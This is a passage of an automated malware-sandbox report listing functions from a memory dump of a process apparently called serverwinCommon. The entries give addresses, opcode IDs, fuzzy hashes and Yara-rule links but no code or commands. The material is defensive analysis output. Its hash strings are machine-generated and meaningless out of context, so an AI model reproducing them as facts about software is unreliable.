                          • Instruction Fuzzy Hash: 37015E30A19A0E9EEF98EF68C4696BD77E0FF18345F1005BAD81DC21A5EE31A650CB41
                          Function 00007FFD9B75FF2F Relevance: .0, Instructions: 47COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9a23a67657b8e491468396460c1dbae001dfcc349a3a409e8765b1776b035507
                          • Instruction ID: 9b08afee4e27bb0d3b480b6ca2347acaa5ee6af3dc395fdec13233ce2618272f
                          • Opcode Fuzzy Hash: 9a23a67657b8e491468396460c1dbae001dfcc349a3a409e8765b1776b035507
                          • Instruction Fuzzy Hash: 1B111C71E0961E8ADBA8DF648C557ADB7B1EF58300F1041FA911DE32A2DE745EC18F40
                          Function 00007FFD9B75ACE8 Relevance: .0, Instructions: 47COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4832e48a5b3eecb7272a9822bd983692a3c549a8ffaed4641745b77d4831a87a
                          • Instruction ID: fcfeb2a90652013dbe03ba70e87d1147ec551b5e40512b5f4fd341cae6635410
                          • Opcode Fuzzy Hash: 4832e48a5b3eecb7272a9822bd983692a3c549a8ffaed4641745b77d4831a87a
                          • Instruction Fuzzy Hash: 49014030A1960E9FDB94EFA4D8686B976A0FF18305F11057AD419C21F4DE7066518B40
                          Function 00007FFD9B760CA0 Relevance: .0, Instructions: 46COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 330afe52aeb96c386b3cb6ab0441c3f7385d0a5d9d471f22b0d6e8a9f2dc9043
                          • Instruction ID: 54f0b96461647b0844f06406505fc62706959d4e0afb202722cdfb399f95c0c8
                          • Opcode Fuzzy Hash: 330afe52aeb96c386b3cb6ab0441c3f7385d0a5d9d471f22b0d6e8a9f2dc9043
                          • Instruction Fuzzy Hash: 0D011A30A15A0E8EEB94EBA4C4686FE77E0FF18305F11057AD41ED21B9EE71A650CB41
                          Function 00007FFD9B75ACA8 Relevance: .0, Instructions: 46COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 42e567f93524e97d9ae04a9d9d09080ad5eec61bcb88f106c5d335666f369f75
                          • Instruction ID: 5e0b9a459a6781e317bf9fae8e83559f68cccd6dd0967464fff40bd30bfe0243
                          • Opcode Fuzzy Hash: 42e567f93524e97d9ae04a9d9d09080ad5eec61bcb88f106c5d335666f369f75
                          • Instruction Fuzzy Hash: 8F01B130A0960E8FDB98EFA4C0656B937A1FF58305F61017AE41EC21B4CA71A651C781
                          Function 00007FFD9B752EB9 Relevance: .0, Instructions: 45COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 87ecd695c5f1a04d60c1196161f6496417a1975886cf3d3621b776f3fea6c2b7
                          • Instruction ID: 69e277e08fc09ca3711912d82be216ef9e0f10a9596e1e1a2905ade87bec55bb
                          • Opcode Fuzzy Hash: 87ecd695c5f1a04d60c1196161f6496417a1975886cf3d3621b776f3fea6c2b7
                          • Instruction Fuzzy Hash: 83018431A0E74E5FE751EBF4886D5A93BE0EF19300F5605F7D408C70F6EAA8A5858700
                          Function 00007FFD9B75281D Relevance: .0, Instructions: 44COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9cd3a54b0b1cb1453351d53f6bcbe9b473d9f2ad479e8c2de97511332db5ca0b
                          • Instruction ID: 6b2126b5ac9bfdc2b1d6ad23a3c2a63d25651e2d2bf407800c71f04896e1dc9e
                          • Opcode Fuzzy Hash: 9cd3a54b0b1cb1453351d53f6bcbe9b473d9f2ad479e8c2de97511332db5ca0b
                          • Instruction Fuzzy Hash: C801D431E0A64E8FE761EBE488585E97BE0EF19300F4606BAD408C70B6EE74F245C700
                          Function 00007FFD9B7505D8 Relevance: .0, Instructions: 44COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: dc526874dbf4097405d26adb59f4deaca88a5e0f12eca0724c6a2def392602fb
                          • Instruction ID: 326fe72bc421167fcef98792ff6876afff62adaaeded1fb34fc23aa85970406f
                          • Opcode Fuzzy Hash: dc526874dbf4097405d26adb59f4deaca88a5e0f12eca0724c6a2def392602fb
                          • Instruction Fuzzy Hash: 6F017130A0960E8EEB58EFA4C0656B977E1EF68306F21457DD40EC35F5CE76A592C740
                          Function 00007FFD9B751C35 Relevance: .0, Instructions: 43COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 38718ad15a5c87c2c51f88cdbc13593a0e71ac22a51b542765afcc31255d52f9
                          • Instruction ID: 21364186cc909278655fce64fc99e56eb141f78a11241b8fe9ee6de8348aa7b3
                          • Opcode Fuzzy Hash: 38718ad15a5c87c2c51f88cdbc13593a0e71ac22a51b542765afcc31255d52f9
                          • Instruction Fuzzy Hash: BC01A230A0A78E8FEB54DEA488252B93BA1EF15301F41017AD408C74F1DAB69551C740
                          Function 00007FFD9B75A909 Relevance: .0, Instructions: 43COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8936259950275e123149f1dd17e4ecf35ca498101d2d7223ecfde69e978d2245
                          • Instruction ID: 1c397f39027d396538165c106f2c89967a9ec0918e495bca877e19afde7d2e4e
                          • Opcode Fuzzy Hash: 8936259950275e123149f1dd17e4ecf35ca498101d2d7223ecfde69e978d2245
                          • Instruction Fuzzy Hash: 21018431E4E78E4FE761EBB488695A97BF0EF59300F0745F7D008C70B2EA64A5448701
                          Function 00007FFD9B767429 Relevance: .0, Instructions: 42COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 62759c38d0976676066e94b91223fee646928504088300abdeccc155c3f7b91b
                          • Instruction ID: 693130e34c2c7e11a57ce4e095837230efa4d5b245a0f09e41c21ba4ce1d2792
                          • Opcode Fuzzy Hash: 62759c38d0976676066e94b91223fee646928504088300abdeccc155c3f7b91b
                          • Instruction Fuzzy Hash: 15016271A5F24A9FE751EB7484696A93FE0EF15310F0645F7C818CB0B7DA38A544C712
                          Function 00007FFD9B773A50 Relevance: .0, Instructions: 42COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1ab3e02a7800cbf3d9507c133ac41ee53c4b65fe031970c6651d296ad1c0459f
                          • Instruction ID: 355b8507fc1a761d517625780605e9fc441dae601e7c4460b6232a5aec35fd02
                          • Opcode Fuzzy Hash: 1ab3e02a7800cbf3d9507c133ac41ee53c4b65fe031970c6651d296ad1c0459f
                          • Instruction Fuzzy Hash: C7016D30E1960E9EEB50FBA8889D6BEB7E4FF18305F020A76E419D3075EA30A2418710
                          Function 00007FFD9B750608 Relevance: .0, Instructions: 42COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5bc86c4ac7ee0a968b8f1d2e2f7f6dc65641037f6051b9d0fa39a44906e0f6f3
                          • Instruction ID: ad07d579efa6e0ed3a76714ca6513228085b1ae4d4773604a7e3026c2136fe85
                          • Opcode Fuzzy Hash: 5bc86c4ac7ee0a968b8f1d2e2f7f6dc65641037f6051b9d0fa39a44906e0f6f3
                          • Instruction Fuzzy Hash: 7801D130A1560E8BEB58EBE4C4686B973A4FF18305F100D7ED41EC21F0DE75A241CA40
                          Function 00007FFD9B750610 Relevance: .0, Instructions: 42COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d76c8922791bc15edbae44ef52b77bf7dde791372dc04840e98af8ec46c97454
                          • Instruction ID: 2399a6981d59135ed4210b1c99e35df5990f3435027ae0ab31c48ec6e30fb26d
                          • Opcode Fuzzy Hash: d76c8922791bc15edbae44ef52b77bf7dde791372dc04840e98af8ec46c97454
                          • Instruction Fuzzy Hash: C601D130A1960E9AEB58EBF4C4686B973E4FF18305F1009BED41EC21F4DE75A641CB10
                          Function 00007FFD9B760C81 Relevance: .0, Instructions: 42COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d9023aefc4ef77da99671451002bd3040e5ef1b4ba6ad9dc3cedf04dd6df13b8
                          • Instruction ID: 1324b6705f1514d86de2b48b9b73e12b33a3e64083b4f70e021c39fcf56c2c08
                          • Opcode Fuzzy Hash: d9023aefc4ef77da99671451002bd3040e5ef1b4ba6ad9dc3cedf04dd6df13b8
                          • Instruction Fuzzy Hash: 38F08630D0A78E8FEB549F6488681FD7BA0FF14301F01057BD818C61B5EB7456508741
                          Function 00007FFD9B75A9D8 Relevance: .0, Instructions: 40COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 57bf4850a171b88a6cf4f9c3ba2cb4802734a99b439921e8db401015638cbd0d
                          • Instruction ID: 3162f347665edcf12a2fd09a9d635aca55920e9c4df0a427ed3a677173758246
                          • Opcode Fuzzy Hash: 57bf4850a171b88a6cf4f9c3ba2cb4802734a99b439921e8db401015638cbd0d
                          • Instruction Fuzzy Hash: CFF08130A5960E9FEB98EFA4C4696B976A0FF18304F12097AE41ED21F1DE356750C641
                          Function 00007FFD9B7678E9 Relevance: .0, Instructions: 40COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 488e53e3922211c655855d5db8892a2a992b876bfafb8b51d8b4ef492c85df11
                          • Instruction ID: c00922336f35d0ed6c7baec8e0dd6c7e1fb1aceed1e4295f9b16a1d45a1fa637
                          • Opcode Fuzzy Hash: 488e53e3922211c655855d5db8892a2a992b876bfafb8b51d8b4ef492c85df11
                          • Instruction Fuzzy Hash: BA01F471E1A60D9FEB14EFE8D456AEDBBA4EF41310F010279E408E72F2CB7529468781
                          Function 00007FFD9B75C379 Relevance: .0, Instructions: 39COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ecca443fb492ce75990281bc5affcec060d7e2f61d17a39940df9fd19c6b12f0
                          • Instruction ID: e325a22bc5017f045c7ef5f4dfe78a784ba654803bb9ad101dfb5de79d836f94
                          • Opcode Fuzzy Hash: ecca443fb492ce75990281bc5affcec060d7e2f61d17a39940df9fd19c6b12f0
                          • Instruction Fuzzy Hash: 2D01A23090E78D8FDB659F7488252A93FA0EF16304F4601BAD449C71B2D674AA54C781
                          Function 00007FFD9B7505D0 Relevance: .0, Instructions: 39COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 886e712a5033cb54466e82aed5e794698e1ccfc304265012d87e349e3cc1a54f
                          • Instruction ID: bc754d6d5a75101da9302eefe287e52be9590220baedba23daefc82a6baa1dea
                          • Opcode Fuzzy Hash: 886e712a5033cb54466e82aed5e794698e1ccfc304265012d87e349e3cc1a54f
                          • Instruction Fuzzy Hash: 8DF0C230A0A64E8FEB54EEA494256FA37A0EF15305F11017AE80DC34F1CFB6A651CB80
                          Function 00007FFD9B7511C0 Relevance: .0, Instructions: 38COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fdd6618a473ee755d38c7f98ab18fab1f9ed51e96b2268bc650774c9925c5e9b
                          • Instruction ID: 621bc022a12aea525d7213600fea646ebd28bf907bc9d2d1478146724bfcb678
                          • Opcode Fuzzy Hash: fdd6618a473ee755d38c7f98ab18fab1f9ed51e96b2268bc650774c9925c5e9b
                          • Instruction Fuzzy Hash: 01F02231E0A64E8AEB649BE488282F977E0EF11302F00027ED42EC24F0EFB42750C240
                          Function 00007FFD9B75EF0C Relevance: .0, Instructions: 36COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 59104719dba1c97807e5be2534873fccc46308f076d19359fff60369de220f21
                          • Instruction ID: fb459956b389072752d957d47d55af809752b3f5e39d19bbe6b613671a7f42c7
                          • Opcode Fuzzy Hash: 59104719dba1c97807e5be2534873fccc46308f076d19359fff60369de220f21
                          • Instruction Fuzzy Hash: 4F010870A0971D8BDB78DF84C8A07E8B7B2EB54301F5002BED109972A1CB786B85CF04
                          Function 00007FFD9B7621C1 Relevance: .0, Instructions: 35COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 72b612624133911ca2d1b291c6e85cee150fe8488782c05849f44412b4390568
                          • Instruction ID: edeb3e2ebb9fc4b46452e927e1648724abf832e143fb539e41f88dd3e1652484
                          • Opcode Fuzzy Hash: 72b612624133911ca2d1b291c6e85cee150fe8488782c05849f44412b4390568
                          • Instruction Fuzzy Hash: D4F0E230A0A34E8FEB689FA088656F93BA0FF01304F4215BAE419C20A2DB39A714C741
                          Function 00007FFD9B752739 Relevance: .0, Instructions: 33COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6a5443c9e058a71aa73bc23d98e7257b64942601a058c172e6f5994eb0724417
                          • Instruction ID: e7a723adb300572435332c7b4f88b12827a7103899a32f1b244d0182c5521932
                          • Opcode Fuzzy Hash: 6a5443c9e058a71aa73bc23d98e7257b64942601a058c172e6f5994eb0724417
                          • Instruction Fuzzy Hash: 4DF0C23090E38E8FDB6AABA088352A93BA0BF06300F4609BAD519C60F2DA789504C741
                          Function 00007FFD9B75B044 Relevance: .0, Instructions: 32COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c6e41cd275d4c958ff02250140f61050997031e8dcd45f1b481a30d32347ebc9
                          • Instruction ID: 8c990d980992c45883c89265335631f66179cf1425142d17a55e1d81101430e5
                          • Opcode Fuzzy Hash: c6e41cd275d4c958ff02250140f61050997031e8dcd45f1b481a30d32347ebc9
                          • Instruction Fuzzy Hash: 0AF03C70E1961D8FDBE0DB98C495BA9B3B1EB54300F1086E6D00DE2265CE306A858F40
                          Function 00007FFD9B76808C Relevance: .0, Instructions: 29COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f121c61b5247d8f4dfc1aa36e9e293ea6cdcd71143497c258e304c4d3927b5a8
                          • Instruction ID: 7a1e3c08af7ba9c2b21bb0768f10572d8915a581ae374f31e377b897ca11b616
                          • Opcode Fuzzy Hash: f121c61b5247d8f4dfc1aa36e9e293ea6cdcd71143497c258e304c4d3927b5a8
                          • Instruction Fuzzy Hash: D0F0BD70E1561D4EDBA0EB688859BA9B7B1FB55300F5141E9904DE2272DE302EC28F01
                          Function 00007FFD9B76792F Relevance: .0, Instructions: 25COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3d6fdd18b73ffa1d3ea52715c2ec198070e23afaa7462ca26ac9ff9b55b4be59
                          • Instruction ID: 503bec02b6e6d8fc15e8306a7bf6a12183db9a57e5ea9756263d22c6dbbaaf6a
                          • Opcode Fuzzy Hash: 3d6fdd18b73ffa1d3ea52715c2ec198070e23afaa7462ca26ac9ff9b55b4be59
                          • Instruction Fuzzy Hash: F2E04F35A1590D8FDB00EB88E8559EEFBB4EF84320F400272D008E32A5DA75698687D0
                          Function 00007FFD9B75BD0B Relevance: .0, Instructions: 19COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ef2d425d37b3b47f699fca9679155594fc4d2dbfb3a0eef04c17fac8e058df78
                          • Instruction ID: fbf55f82e20abe7bd171f9d4d7b255dac87ccf6dfe9b8fc38cb14580a49f5e78
                          • Opcode Fuzzy Hash: ef2d425d37b3b47f699fca9679155594fc4d2dbfb3a0eef04c17fac8e058df78
                          • Instruction Fuzzy Hash: 42D0E235E08A2D8FCF50EFC8D8102ECB7B0FB58300B000136D00DD3261CB6068118B00
                          Function 00007FFD9B755963 Relevance: .0, Instructions: 18COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 15f3ff66a22f9e42de22b427790b1cf0469de503211d77b0e94b4ca2800d7886
                          • Instruction ID: 572d8777c190ee3e4e64ff296b2008891e02c74c62be49f2fd8f81ad39c04609
                          • Opcode Fuzzy Hash: 15f3ff66a22f9e42de22b427790b1cf0469de503211d77b0e94b4ca2800d7886
                          • Instruction Fuzzy Hash: F1E0C970E45A2D8FDBB4DB44CC94BE9B3B1AB58301F1001E9800DE32A0EA745FC18F80
                          Function 00007FFD9B767BFF Relevance: .0, Instructions: 16COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8f571c76b9d834224ba2954dd18a2a73f88acf997d1e145b981cde7690fc8249
                          • Instruction ID: 7a9379a2aa944997a863d46e9acdec6b6177b2a4d2ca022afc250a14ed8171c5
                          • Opcode Fuzzy Hash: 8f571c76b9d834224ba2954dd18a2a73f88acf997d1e145b981cde7690fc8249
                          • Instruction Fuzzy Hash: 9DE0EC30B0A61ECEDB28DA80C8609FD73A1FB54351B110B3AC416D62A1DB746A049685

                          Non-executed Functions

                          Function 00007FFD9B75F6B8 Relevance: 7.6, Strings: 6, Instructions: 92COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID: $$9$F$N$[$g
                          • API String ID: 0-3581475096
                          • Opcode ID: 1f55f3a880c7071de7bd3d1c1abb0469165602199f685e081e4457482d6b4f33
                          • Instruction ID: 669624d537e0cd58a30c10251f2d55854905204fc0459585e76e6036eac380fc
                          • Opcode Fuzzy Hash: 1f55f3a880c7071de7bd3d1c1abb0469165602199f685e081e4457482d6b4f33
                          • Instruction Fuzzy Hash: A741B470E0972DCFEB74DF94C8A47ACB6B1AB54305F1105EAD51DA62A1CBB86E81CF01
                          Function 00007FFD9B75E4B5 Relevance: 5.1, Strings: 4, Instructions: 101COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID: 5$F$\$a
                          • API String ID: 0-2903695511
                          • Opcode ID: d442efad0acb988bc7138559593e78c8f969b73bd1a80f77d03338b153ddc7fd
                          • Instruction ID: d33725b0a4a406f5ae662ff8ee3aa2119590f6d94a31c35a507577eff428a2f4
                          • Opcode Fuzzy Hash: d442efad0acb988bc7138559593e78c8f969b73bd1a80f77d03338b153ddc7fd
                          • Instruction Fuzzy Hash: 5041A570E0972D8FDB68DF94C8A47E9B6B1AB58301F1005EAD11DA62A1CB745B81DF40
                          Function 00007FFD9B75F20F Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID: ,$0$7${
                          • API String ID: 0-2418471262
                          • Opcode ID: a3608f4d8d23afa1590fdfc6b15428a3ae4ec0b30ec496857e6f60fc8986dd0b
                          • Instruction ID: ac977d8048e5dbc6bcce69435b2491db88613a464e09ef46a06c245a939eabdb
                          • Opcode Fuzzy Hash: a3608f4d8d23afa1590fdfc6b15428a3ae4ec0b30ec496857e6f60fc8986dd0b
                          • Instruction Fuzzy Hash: 9641F770A0972ECFEB78DF94C8647ADB7B1AF54300F1145AAD10D9A2A1CB786B81CF41
                          Function 00007FFD9B75E939 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID: 5$Q$V$u
                          • API String ID: 0-1755314862
                          • Opcode ID: 78bb6e6e0e006e9851b5a03d89f3eb9d8050e47503cc7d0cabf2d30f2826e3ea
                          • Instruction ID: 7de7e781d23d788f64b9c47492b6d07cc423b629b29956dc0254cd75bdc432e5
                          • Opcode Fuzzy Hash: 78bb6e6e0e006e9851b5a03d89f3eb9d8050e47503cc7d0cabf2d30f2826e3ea
                          • Instruction Fuzzy Hash: DF410A70E0971D8BEB78DF94C8647E9B7B2AF54300F1045BAD14DA62A1CBB85A81CF41
                          Function 00007FFD9B75EF25 Relevance: 5.0, Strings: 4, Instructions: 48COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
